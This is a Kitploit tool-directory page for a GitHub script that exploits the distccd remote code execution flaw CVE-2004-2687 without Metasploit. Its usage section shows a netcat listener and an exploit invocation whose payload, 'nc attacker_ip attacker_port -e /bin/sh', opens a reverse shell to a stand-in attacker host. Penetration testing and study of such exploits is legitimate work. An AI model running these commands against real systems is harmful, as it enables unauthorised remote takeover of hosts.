Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
distccd_rce_CVE-2004-2687 | Kitploit
Tools/GitHubGitHub/micheaol/distccd_rce_cve-2004-2687
Vulnerability AnalysisExploitationPenetration TestingCommand and ControlRed TeamingRemote Access Tool
GitHubmicheaol/distccd_rce_cve-2004-2687

distccd_rce_CVE-2004-2687

View Repository
4 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

The goal of this script NOT to use Metasploit and to do it manually.

Usage:

root@kitploit:~
	nc -lvnp 4466

Running the exploit:

root@kitploit:~
	python3 ./exploit.py -t target_ip -p target_port -c "nc attacker_ip attacker_port -e /bin/sh"
Download Tool